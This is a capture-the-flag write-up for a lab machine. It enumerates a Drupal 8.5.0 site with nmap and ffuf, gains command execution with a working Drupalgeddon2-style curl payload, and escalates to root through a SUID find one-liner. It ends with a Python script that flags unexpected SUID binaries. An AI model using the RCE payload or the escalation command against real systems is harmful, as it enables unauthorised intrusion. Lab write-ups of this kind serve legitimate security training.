Ejotapete


Enumeration
Let's start with an nmap scan of all TCP ports:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ nmap -p- --open -sS --min-rate=5000 -n -Pn -vvv 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 11:09 CEST
Initiating ARP Ping Scan at 11:09
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:09, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:09
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:09, 0.67s elapsed (65535 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000060s latency).
Scanned at 2025-07-17 11:09:56 CEST for 1s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Only port 80 is open, so let's run a second scan with default scripts and version detection to see which service and version are running on it:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ nmap -p80 -sCV 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 11:10 CEST
Nmap scan report for 172.17.0.2
Host is up (0.000031s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: 172.17.0.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.47 seconds
The root of the site returns a 403 Forbidden. On Apache that usually means there is no index file in the document root and directory listing is disabled, so the real content is probably hidden in a subdirectory. Let's look at it in Firefox:

Hmm… Let's fuzz for directories and common file extensions to see if we find anything more interesting:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://172.17.0.2/FUZZ" -e .php,.html,.js,.txt,.css
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://172.17.0.2/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .js .txt .css
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
drupal [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 0ms]
We find a directory called drupal, which is much more interesting. Let's browse to it:

Interesting. Let's fuzz the drupal directory as well, looking for default files that give away the exact version:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://172.17.0.2/drupal/FUZZ" -e .php,.html,.js,.txt,.css
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://172.17.0.2/drupal/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .js .txt .css
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.php [Status: 200, Size: 8902, Words: 1473, Lines: 233, Duration: 201ms]
contact [Status: 200, Size: 12198, Words: 1639, Lines: 252, Duration: 81ms]
search [Status: 302, Size: 388, Words: 60, Lines: 12, Duration: 10ms]
user [Status: 302, Size: 384, Words: 60, Lines: 12, Duration: 6ms]
themes [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 0ms]
modules [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]
admin [Status: 403, Size: 8087, Words: 1367, Lines: 214, Duration: 18ms]
node [Status: 200, Size: 8892, Words: 1473, Lines: 233, Duration: 11ms]
sites [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 0ms]
Search [Status: 302, Size: 388, Words: 60, Lines: 12, Duration: 1009ms]
Contact [Status: 200, Size: 12180, Words: 1638, Lines: 252, Duration: 11ms]
core [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 0ms]
install.php [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 0ms]
profiles [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 0ms]
update.php [Status: 403, Size: 133, Words: 21, Lines: 1, Duration: 98ms]
README.txt [Status: 200, Size: 5889, Words: 748, Lines: 140, Duration: 0ms]
vendor [Status: 403, Size: 298, Words: 22, Lines: 12, Duration: 0ms]
We see the file install.php; let's open it:

Good, we have the Drupal version: 8.5.0. Searching for it shows there is a published CVE affecting this version:
Shell as www-data
Let's exploit it!
While researching, I came across the following payload:
curl -s 'http://DRUPAL-TARGET/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=id'
The request hits the AJAX callback of the user registration form. The mail[a][#post_render][]=exec parameter injects a callback into a Form API render array, and Drupal calls it with the rendered #markup (our command, here id) as its argument, so the command runs on the server as the web user. Let's try it against our target:
┌──(pylon㉿kali)-[~/…/pylon/DL/Ejotapete/nmap]
└─$ curl -s 'http://172.17.0.2/drupal/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
--data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=id'
{"command":"insert","method":"replaceWith","selector":null,"data":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
We have remote command execution as www-data. Now let's use it to send ourselves a reverse shell:

Shell as root
Let's enumerate binaries with the SUID bit set:
www-data@42beeea01109:/var/www/html/drupal$ find / -perm -4000 -ls 2>/dev/null
4850458 40 -rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
4850546 40 -rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
4850503 76 -rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
4850556 60 -rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
4882251 220 -rwsr-xr-x 1 root root 221768 Feb 18 2017 /usr/bin/find
4850456 52 -rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
4882165 140 -rwsr-xr-x 1 root root 140944 Jan 23 2021 /usr/bin/sudo
4849935 44 -rwsr-xr-x 1 root root 44304 Mar 7 2018 /bin/mount
4849958 32 -rwsr-xr-x 1 root root 31720 Mar 7 2018 /bin/umount
4849951 40 -rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
The find binary stands out, since it is not normally SUID. Looking it up on GTFOBins tells us the following:

Let's exploit it. The -p flag matters: bash drops the effective uid back to the real one unless started in privileged mode, and -quit stops find after the first match so only one shell is spawned:
www-data@42beeea01109:/var/www/html/drupal$ /usr/bin/find . -exec /bin/bash -p \; -quit
bash-4.4# whoami
root
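Spotting find in that list by eye works on a ten-line listing, but a quick diff against what a stock image ships with is the check you want on a real host. As an added example (not from the write-up), this parses the output of find / -perm -4000 -ls, keeps root-owned setuid files and reports anything not in a baseline. The baseline is an assumption taken from the listing above, not an authoritative Debian package manifest, and the sample listing is the one obtained on the box:

```python
#!/usr/bin/env python3
"""Triage `find / -perm -4000 -ls` output against a baseline of expected
SUID-root binaries. Added example, not code from the original write-up.
The baseline is an assumption derived from the listing in the write-up."""
import subprocess

# Assumption: SUID-root files expected on a minimal Debian 9 image.
DEBIAN_BASELINE = {
    "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/passwd",
    "/usr/bin/chfn", "/usr/bin/sudo", "/bin/mount", "/bin/umount", "/bin/su",
}

# Constructed sample: the listing obtained on the box. `find -ls` fields are
# inode, blocks, mode, links, owner, group, size, month, day, year, path.
SAMPLE_LISTING = """\
4850458 40 -rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
4850546 40 -rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
4850503 76 -rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
4850556 60 -rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
4882251 220 -rwsr-xr-x 1 root root 221768 Feb 18 2017 /usr/bin/find
4850456 52 -rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
4882165 140 -rwsr-xr-x 1 root root 140944 Jan 23 2021 /usr/bin/sudo
4849935 44 -rwsr-xr-x 1 root root 44304 Mar 7 2018 /bin/mount
4849958 32 -rwsr-xr-x 1 root root 31720 Mar 7 2018 /bin/umount
4849951 40 -rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
"""


def parse_ls_line(line):
    """Return (mode, owner, path) from one `find -ls` line, or None if the
    line does not have the eleven expected fields (path may contain spaces)."""
    parts = line.split(None, 10)
    if len(parts) < 11:
        return None
    return parts[2], parts[4], parts[10]


def setuid_root(listing):
    """Paths whose mode string has the setuid bit ('s' or 'S' in the
    owner-execute slot, index 3) and whose owner is root."""
    found = []
    for line in listing.splitlines():
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, owner, path = parsed
        if owner == "root" and mode[3] in "sS":
            found.append(path)
    return found


def unexpected_suid(listing, baseline=DEBIAN_BASELINE):
    """SUID-root binaries not in the baseline: the privilege-escalation
    candidates to look up on GTFOBins."""
    return [p for p in setuid_root(listing) if p not in baseline]


def live_listing():
    """Run the same enumeration the write-up used (needs a shell on the box)."""
    return subprocess.run(["find", "/", "-perm", "-4000", "-ls"],
                          capture_output=True, text=True).stdout


# Why the GTFOBins one-liner `find . -exec /bin/bash -p \; -quit` works:
# find is SUID root, so the process it spawns starts with euid 0; bash -p
# keeps that euid (without -p, bash resets euid to the real uid when they
# differ); -quit makes find stop after the first match, so one shell only.
if __name__ == "__main__":
    for path in unexpected_suid(SAMPLE_LISTING):
        print("unexpected SUID root binary:", path)
```

Running it on the sample prints /usr/bin/find as the only unexpected entry; on a live host, feed live_listing() to unexpected_suid() instead, and expect the baseline to need tuning per distribution.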